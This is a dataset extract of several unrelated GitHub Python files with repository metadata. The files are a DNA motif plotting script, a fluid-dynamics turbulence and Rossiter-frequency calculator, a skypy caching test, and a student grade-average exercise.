c9f1be0d07eed045b23653c1e106ba1532553bf3 | 95f6c4f2edd55add55adfa02cb37ab6ff1cb5af9 | /channels/telegram/__init__.py | 17b2efded395916641c6fa7ef4e80cf2fa0cb71f | [
"LicenseRef-scancode-other-permissive"
] | permissive | SeedVault/rhizome | de5832bb29e792c711b57070f0d7ab109fb59875 | b94ef5e75411ac4a214f5ac54d04ce00d9108ec0 | refs/heads/master | 2022-12-10T19:10:35.581534 | 2020-02-22T02:06:30 | 2020-02-22T02:06:30 | 145,477,664 | 8 | 3 | NOASSERTION | 2022-12-08T03:14:00 | 2018-08-20T22:42:16 | Python | UTF-8 | Python | false | false | 33 | py | """Package channels.telegram."""
| [
"nicolas@botanic.io"
] | nicolas@botanic.io |
98c511760929dd8c5b0092cd5560908bb71b0144 | 0276a4b8b92da8aa167e222391bf2d8370ef7022 | /Motif_mark.py | 8362aeb3a6ad3c44c08806c6cf63c382eadb54c9 | [] | no_license | alexadowdell/motif-mark | ab7fb69424390b2b5eb909ce187f35778a302bf3 | ad5acc63d3a8e78968f61da8aad3f9efe4aa38ee | refs/heads/master | 2021-04-09T16:01:06.919763 | 2018-03-20T04:48:14 | 2018-03-20T04:48:14 | 125,677,248 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,246 | py | #!/usr/bin/python3
#from IPython.core.display import SVG, display
import argparse
import cairo
import random
#####################################################################################################################
############################################ Set up Argparse ########################################################
#####################################################################################################################
parser = argparse.ArgumentParser(description="Motif Marker: Identifies and counts motif sequences that appear in gene sequences from a FASTA file and constructs an image of the motif locations in relation to intron/exons.")
parser.add_argument("-f", "--file", help="Required parameter. Please pass a FASTA file with gene names in the sequence ID and exons CAPITALIZED", required=True, type=str)
parser.add_argument("-m", "--motif", help="Require parameter. Please pass of text file of motifs (one per line) to be used to look for. Motifs must use IUPAC nucleotide code format", required=True, type=str)
args = parser.parse_args() #sets arguments as call-able
f = args.file
m = args.motif
#f = "./sequences.fasta"
#m = "./motifs.txt"
#####################################################################################################################
############################################ Define main functions ##################################################
#####################################################################################################################
#Initiate and construct a dictionary with all IUPAC nucleotide codes to bases. Keys = nucleotide code, Value = Bases
iupac_dict = {"A": "[Aa]", "C":"[Cc]", "G":"[Gg]", "T":"[TtUu]","U":"[UuTt]", "R": "[AaGg]", "Y":"[TtCcUu]",
"S":"[CcGg]", "W":"[AaTtUu]","K":"[GgTtUu]", "M":"[AaCc]", "B":"[CcGgTtUu]", "D":"[AaGgTtUu]",
"H":"[AaCcTtUu]", "V":"[AaCcGg]", "N":"[AaTtCcGgUu]", "a": "[Aa]", "c":"[Cc]", "g":"[Gg]",
"t":"[TtUu]","u":"[UuTt]", "r": "[AaGg]", "y":"[TtCcUu]", "s":"[CcGg]", "w":"[AaTtUu]","k":"[GgTtUu]",
"m":"[AaCc]", "b":"[CcGgTtUu]", "d":"[AaGgTtUu]", "h":"[AaCcTtUu]", "v":"[AaCcGg]", "n":"[AaTtCcGgUu]"}
def split_sequence(sequence):
'''Parses fasta sequence and splits up a sequence in the form of 'preintronEXONpostintron', into seperated
items in a list [intron_1, exon, intron_2] '''
intron_1 = ""
intron_2 = ""
exon = ""
exon_identified = False
for char in sequence:
if (char.islower() == False): # If lowercase letters stop being found, the exon was located.
exon += char #Exon identified
exon_identified = True
elif (exon_identified == False): #If the exon was not identified yet, the
intron_1 = intron_1 + char
else:
intron_2 = intron_2 + char
return [intron_1, exon, intron_2]
def fasta_conversion(fastaFile):
''' Takes in a fasta file. Construct a dictionary parsing the fasta with the key being the sequence header
and the value being the full sequence in one string. Returns a fasta dictionary with entries in the form
{Header:Sequence}'''
with open(fastaFile) as fh:
fastaDict = {}
header = ""
sequence = ""
firstLine = True
for line in fh:
line = line.strip()
if line[0] == ">": #if the line starts with a '>' its a header
if (firstLine != True): #
fastaDict[header] = split_sequence(sequence) #for all additional lines,
header = line #if first line is true, set the header line
sequence = "" #still first line, initialize the sequence
else:
sequence += line
firstLine = False
fastaDict[header] = split_sequence(sequence) #special case
return fastaDict
def parse_motifs(motifFile):
'''Takes in a text file of motifs and creates a list of the motifs. For each motif, each nucleotide code is
evaluated and the corresponding IUPAC bases are associated with it. Dictionary is returned key=motif, value=list
of sets of bases corresponding to each character in the motif.'''
motifList = []
motifDict = {}
with open(motifFile) as fh:
for line in fh:
motifList.append(line.strip()) #Create a list of all motifs in file
for motif in motifList: #for each motif in list
regex = []
for char in motif: #look at each nucleotide individually
regex.append(iupac_dict[char]) #finding corresponding base codes and return them as the value in the dictionary
motifDict[motif] = regex #Dictionary: key=motif, value=list associated base combinations
return motifDict
def extract_motif_pos(header, sequence, motifDict):
'''Takes in a motif header, associated sequence and motif dictionary. Walks through a sequence looking for instances
of the associated motif by referencing the possible combinations of bases given the IUPAC nucleotide codes. Returns
a list of positions the motif was found at in the sequence'''
positionList = {} #Initialize a dictionary of motif positions
for motif in motifDict.keys(): #For each motif in the dictionary
motif_codes = motifDict[motif] #set the motif's associated regex nucleotide codes to a variable.
frame = len(motif)
for i in range(0,len(sequence) - frame):
current_frame = sequence[i:i + frame] #all possible frames across the sequence the length of the motif, as bases
counter = 0
motif_match = True
for base in current_frame:
if base not in motif_codes[counter]:#if base does not match one in the possible motif codes
motif_match = False
counter += 1
if (motif_match == True): #if motif match is found
if header + "_" + motif in positionList:
positionList[header + "_" + motif].append(i) #extract the position and add it to the value of that header_motif in list form
else:
positionList[header + "_" + motif] = [i] #if the motif was not found yet, add it as a new entry to the dictionary,
#value is a new initialized list with the position
return positionList
def identify_all_motifs(fastaFile, motifFile):
'''Takes in a fasta file and a motif text file. Returns a positions list containing motifs and the occurences of those motifs
for each fasta sequence, as well as the locations of the pre-intron, exon, and post-intron.'''
fastaDict = fasta_conversion(fastaFile) #Create fasta dictionary {header:sequence}
motifDict = parse_motifs(motifFile) #Create dictionary of motifs {motif:nucleotide code combinations in IUPAC format for the motif}
positionList = []
for entry in fastaDict.items():
sequence = "".join(fastaDict[entry[0]])
header = entry[0]
content = extract_motif_pos(header, sequence, motifDict) #extract all positions of motifs
content["intron_1"] = len(fastaDict[entry[0]][0]) #extract all positions of pre-introns
content["exon"] = len(fastaDict[entry[0]][1]) #extract all positions of exons
content["intron_2"] = len(fastaDict[entry[0]][2]) #extract all positions of post-introns
positionList.append(content) #Create one global position list containing all motif positions, pre-introns, exons,
# and post-introns for each sequence passed in.
return positionList
#####################################################################################################################
######################################## Define plotting functions ##################################################
#####################################################################################################################
def add_gene_name(start_pos, gene):
'''Add gene name to the left of gene drawn in black'''
context.set_source_rgb(0.4,0.4,0.4)
context.move_to(start_pos[0] - 100, start_pos[1]) #defines location of gene name placement
context.show_text(gene) #prints gene name
def add_labels(r, g, b, alpha, start_pos, adjustment, motif):
'''Add motif names in the random colors the markers were generated in'''
context.set_source_rgba(r, g, b, alpha)
context.move_to(start_pos[0] - 57, start_pos[1] + adjustment) #adjust motif label placement
context.show_text(motif) #prints motif name
def draw_gene(intron_1 , intron_2, exon_len, context, start_pos):
'''Draw the gene in grey/black intron, exon, intron, with the exon being a wider width rectangle'''
context.set_line_width(1)
context.set_source_rgb(0.4,0.4,0.4) #grey/black
context.move_to(start_pos[0], start_pos[1])
context.line_to(start_pos[0] + intron_1 + exon_len + intron_2, start_pos[1])
context.stroke()
context.set_line_width(10)
context.move_to(start_pos[0] + intron_1, start_pos[1])
context.line_to(start_pos[0] + intron_1 + exon_len, start_pos[1])
context.stroke()
def draw_motifs(positionList, context, start_pos, motif):
'''Draw markers at the position each motif was found in the sequence. Randomly generated
color corresponding to gene labels'''
r = random.random()
g = random.random()
b = random.random()
alpha = random.uniform(0.7, 1.0)
context.set_line_width(10)
context.set_source_rgba(r, g, b, alpha)
for position in positionList:
context.move_to(start_pos[0] + position, start_pos[1])
context.line_to(start_pos[0] + position + len(motif), start_pos[1])
context.stroke()
context.move_to(start_pos[0] + position, start_pos[1] - 20)
context.show_text(str(position))
return [r, g, b, alpha]
#####################################################################################################################
################################################ Main code ##########################################################
#####################################################################################################################
#Main command, finds all motif positions, intron, and exon positions
global_positions = identify_all_motifs(f, m)
#Construct a drawing surface and identify a start position
surface = cairo.SVGSurface("motif_plot.svg", 1500, 800)
context = cairo.Context(surface)
context.set_line_width(10)
start_pos = [200,150]
for entry in global_positions:
draw_gene(entry["intron_1"],entry["intron_2"],entry["exon"], context, start_pos)
adjustment = -10
for item in entry.items():
if item[0][0] == ">":
motif = item[0].split("_")
motif = motif[1]
gene = item[0].split(" ")
gene = gene[0][1:]
color = draw_motifs(item[1], context, start_pos, motif)
add_gene_name(start_pos, gene)
add_labels(color[0], color[1], color[2], color[3], start_pos, adjustment, motif)
adjustment = adjustment + 10
start_pos = [start_pos[0], start_pos[1] + 100]
#display(SVG('example.svg'))
| [
"adowdell@uoregon.edu"
] | adowdell@uoregon.edu |
cf63b4a0764db2a24c7a3992b08ae676ec0ea0fd | d81251967de1a26ef9dd815e17b1fed89f4f63b5 | /lib/logic.py | a24db40b294f4f76a1d043712b0d741b2977a141 | [
"MIT"
] | permissive | dhavalshiyani/Variable_calculator | 3a29f9d0d3c7fb1b2131ceb919cad53dc806a9f5 | 936895eb9463a7bd6a1a8d5aa391cb6531490c77 | refs/heads/master | 2020-03-21T07:04:36.910267 | 2018-06-22T06:21:13 | 2018-06-22T06:21:13 | 138,259,132 | 0 | 0 | MIT | 2018-06-22T05:56:50 | 2018-06-22T05:37:37 | null | UTF-8 | Python | false | false | 4,332 | py | import sys
import os
import commands
import math
#from tabulate import tabulate
import linecache
import configinfo
mu,Cmu = configinfo.constants()
def turbcalc(mu, Cmu):
#User-input
try:
calcType = raw_input('\n'"Calculate boundary layer(\"del\") or inlet length(\"len\"): ")
type_of_solver = raw_input("SolverType boundary layer based \"blb\" or Mixing length based \"mlb\": ")
#flow_type = raw_input("laminar \"l\" or turbulent \"t\": ")
velc = float(input('\n'"Enter freestream velocity: "))
input_turbint = float(input("Enter turbulent intensity(%): "))
except ValueError:
PrintException()
print'Match the words within \'\''
sys.exit(1)
#Basic_Calculations
turbint = input_turbint*0.01
k = (1.5*((velc*turbint)**2))
#Case_Dependent Calculations:
if calcType == 'del':
ref_l = float(input("Enter reference length: "))
Re = float((velc*ref_l)/mu)
if Re < 2300:
delta = 4.91*ref_l/(Re**(1.0/5.0))
else:
delta = 0.382*ref_l/(Re**(1.0/5.0))
if calcType == 'len': #Fix this Re calculated before knowing the value
delta = float(input("Enter boundary layer thickness: "))
if Re < 2300:
ref_l = (delta*(Re**(1.0/5.0)))/4.91
else:
ref_l = (delta*(Re**(1.0/5.0)))/0.382
Re = float((velc*ref_l)/mu)
if type_of_solver == 'blb':
l = (0.22*delta)
epsilon = (Cmu*((k**1.5)/l))
omega = ((math.sqrt(k))/l)
if type_of_solver == 'mlb':
l = (0.4*delta)
epsilon = ((Cmu**(3.0/4.0))*((k**1.5)/l))
omega = ((Cmu**(-1.0/4.0))*((math.sqrt(k))/l))
#Output
print '\n''Output:'
print '--------------------------------------'
if Re > 2300:
print 'Flow is TURBULENT'
else:
print 'Flow is LAMINAR'
print '\n''Re:', round(Re, 4)
print 'Boundary layer thickness:', round(delta, 6), ' m'
print 'Mixing length(l):', round(l, 4)
print '\n''k:', round(k, 6)
print 'Epsilon:', round(epsilon, 6)
print 'Omega:', round(omega, 6)
print '--------------------------------------''\n'
return(Re, k, epsilon,omega, delta)
def timecalc():
#User-input
l = float(input('\n'"Enter length of the edge (m): "))
n = float(input("Enter number of divisions (n): "))
R = float(input("Enter bias factor (R): "))
velc = float(input("Enter freestream velocity (m/s): "))
#Small r calc:
try:
r = R**(1.0/(n-1.0))
except ZeroDivisionError, e:
#Simpler way to throw exception without details #z = e
#print '\n', z, '\n''Number of divisions (n) cannot be 1'
PrintException()
print 'Number of divisions cannot be 1''\n'
sys.exit(1)
#Grading dependent calculations:
if R > 1.0:
alpha = R
#Smallest Cell size calculation:
deltax_s = (l*(r-1))/((alpha*r)-1)
if R < 1.0:
alpha = (1.0-(r**(-n))+(r**(-1.0)))
#Smallest Cell size calculation:
deltax_s = (l*(r-1))/((alpha*r)-1)
if R == 1.0:
print '\n'"No Biasing found"
deltax_s = l/n
#Time-step calc
delta_t = (1.0*deltax_s)/velc
#Output:
print '\n''Output:'
print '-----------------------------------------'
print "Time-step should be <= ",delta_t
print "Smallest cell size = ",deltax_s
print '-----------------------------------------'
print '\n'
return
def rossitercalc():
#create list of output
L_Frequencies = []
L_keys = []
#constants
alpha = 0.25
k = 0.57
a = 343.54
gamma = 1.4
#User-input
m = int(input('\n'"Enter the number of modes: "))
L = float(input("Enter the length of cavity (m): "))
Uinf = float(input("Enter freestream velocity (m/s): "))
#Common terms calculated once (time savers):
Minf = Uinf/a
#print '\n'"M: ", Minf
outside_multiplier = Uinf/L
#print 'outside_multiplier: ', outside_multiplier
gamma_term = (gamma-1)/2
#print '\n', gamma_term
denominator = ((Minf/math.sqrt(1+gamma_term*Minf))+(1/k))
#print '\n'"Denominator: ", denominator
print '\n'
print 'Rossiter Frequencies'
print '--------------------'
for i in range(1, m+1):
fi = outside_multiplier*(i-alpha)/denominator
print 'f%d = %f Hz' %(i, fi)
L_Frequencies.append(fi)
L_keys.append("f_%d" %(i))
print '--------------------'
print '\n'
#Table format from tabulate ignored for now
#print L_keys
#print L_Frequencies
return | [
"noreply@github.com"
] | dhavalshiyani.noreply@github.com |
4d57700a00166a0ef228e6730a98bd44d84c7b14 | 6e5b10e1b204b1ae7f4c7270f010e3b8db8fc185 | /src/python/skypy/soft_cache_test.py | 35c73f368b8f48f29c894fa54ba3f7ed9b909bdc | [
"ISC",
"LicenseRef-scancode-other-permissive"
] | permissive | ms705/ciel | 9c04e8cb4f62464de46f98997f85fd37f8a13933 | 0e7045984161dfa104fd3c8296439e03321109c9 | refs/heads/master | 2021-01-17T21:39:12.931308 | 2011-06-20T14:46:04 | 2011-06-20T14:46:04 | 1,416,212 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,229 | py |
from __future__ import with_statement
import skypy
import soft_cache
def counter(ref):
cached_result = soft_cache.try_get_cache([ref], "wc")
if cached_result is not None:
print "Counter: got cached result! It was", cached_result
else:
with skypy.deref_as_raw_file(ref, make_sweetheart=True) as in_fp:
cached_result = len(in_fp.read())
print "Counter: calculated result anew. It was", cached_result
soft_cache.put_cache([ref], "wc", cached_result)
return cached_result
def skypy_main():
new_output_index = skypy.get_fresh_output_index()
out_fp = skypy.open_output(new_output_index)
with out_fp:
for i in range(100000):
out_fp.write("Whoozit")
out_ref = out_fp.get_completed_ref()
first_counter = skypy.spawn(counter, out_ref, extra_dependencies=[out_ref])
second_counter = skypy.spawn(counter, out_ref, extra_dependencies=[out_ref])
with skypy.RequiredRefs([first_counter, second_counter]):
first_result = skypy.deref(first_counter)
second_result = skypy.deref(second_counter)
return "First counter said", first_result, "and second one said", second_result
| [
"cs448@cam.ac.uk"
] | cs448@cam.ac.uk |
c61978a01142cd65fa4c4179394a7d9216b3351e | b3b0f9755153a3aa710ff1bb58c3cbac50e21d65 | /Aula06/Exercício3.py | e54af58594e42a92fe8ba78647d81262fe069f2f | [] | no_license | NicoleGruber/AulasPython | ac36d505ae814792f3311139b673bc89be45c8a8 | 94a6c91c3d83314f711003eb3fd4ff452102dd49 | refs/heads/master | 2021-07-10T05:04:49.221712 | 2020-02-25T01:35:35 | 2020-02-25T01:35:35 | 234,075,283 | 0 | 0 | null | 2021-03-20T03:00:53 | 2020-01-15T12:24:32 | Python | UTF-8 | Python | false | false | 794 | py | #---- Exercício 3 - Foreach
#---- Escreva programa que leia as notas (4) de 10 aluno
#---- Armazene as notas e os numes em listas
#---- Imprima:
# 1- O nome dos alunos
# 2- Média do aluno
# 3- Resultado (Aprovado>=7.0)
n1=0
n2=1
n3=2
n4=3
ListaAlunos = []
ListaNotas = []
for i in range(0,1) :
ListaAlunos.append(input(f'Digite o nome do aluno {i+1}: '))
for n in range(0,4):
ListaNotas.append(float(input(f'Digite a nota {n+1}: ')))
for aluno in ListaAlunos:
media=(ListaNotas[n1]+ListaNotas[n2]+ListaNotas[n3] + ListaNotas[n4])/4
print(f'Aluno: {aluno} - resultado: ')
print(f'Média: {media}')
if media>= 7:
print('Aprovado!')
else:
print('Reprovado!')
n1 += 4
n2 += 4
n3 += 4
n4 += 4
| [
"57449553+NicoleGruber@users.noreply.github.com"
] | 57449553+NicoleGruber@users.noreply.github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.